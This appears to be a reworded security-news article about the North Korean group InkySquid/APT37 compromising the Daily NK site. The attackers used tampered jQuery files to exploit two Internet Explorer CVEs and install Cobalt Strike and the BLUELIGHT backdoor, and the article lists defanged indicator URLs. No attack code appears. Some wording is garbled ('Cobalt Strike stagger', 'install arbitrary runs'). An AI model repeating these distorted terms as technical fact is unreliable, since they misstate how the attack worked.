Internet Browser Vulnerabilities Exploited by North Korean Hackers to Implant Malware
A threat actor from North Korea has indeed been found exploiting two flaws in the Internet Explorer to attack individuals with a specialized implant, targeting a South Korean online daily newspaper as a component of strategic web compromise (SWC).
Volexity, a cybersecurity firm, has accredited these attacks and operations to a threat actor recognized by the name InkySquid also better known by the monikers ScarCruft and APT37. It is indeed a widely known North Korean hackers’ body. Daily NK — the publication of concern, is believed to have been host to the malevolent code from at least the end of March 2021 to early June 2021.
InkySquid, the infamous North Korean hacker group has been leveraging the vulnerability since 2020 to upload falsified Javascript code that is usually buried within the genuine code in cyberattacks against an Internet Explorer browser.
However, according to security researchers, earlier in April this year, Volexity identified a suspicious code loaded via www.dailynk[.]com onto unlawful jquery[.]services subdomains. There are two types of URLs identified, which are listed below:
- hxxps://www.dailynk[.]com/wp-includes/js/jquery/jquery.min.js?ver=3.5.1
- hxxps://www.dailynk[.]com/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.3.2
Further, Volexity experts have noted that the “clever disguise of exploit code amongst legitimate code” as well as the usage of bespoke malware allows attackers to escape detection.
These attacks involved manipulating the jQuery JavaScript libraries on the website to serve further obscured code from a remote URL and use it to abuse the exploits of two Internet Explorer vulnerabilities that were addressed by Microsoft in August 2020 and March 2021. A Cobalt Strike stagger, as well as the BLUELIGHT new backdoor, have successfully been deployed.
- CVE-2020-1380 (CVSS score: 7.5) – Scripting Engine Memory Corruption Vulnerability
- CVE-2021-26411 (CVSS score: 8.8) – Internet Explorer Memory Corruption Vulnerability
It must be mentioned that both the vulnerabilities were actively leveraged in the wild by the North Korean hackers using them to target security scientists working in research and development on vulnerabilities in an operation that was uncovered earlier in January.
After the timely implementation of the Cobalt Strike, BLUELIGHT is employed as a secondary payload, as a full-featured remote access technique that allows total access to an affected system.
Along with obtaining system metadata and antivirus product information, malware can execute shellcodes, collect cookies and credentials through Internet Explorer, Microsoft Edge, and Google Chrome browsers, acquire files, and install arbitrary runs that are exfiltrated to a remote server.
If you like the site, please consider joining the telegram channel or supporting us on Patreon using the button below.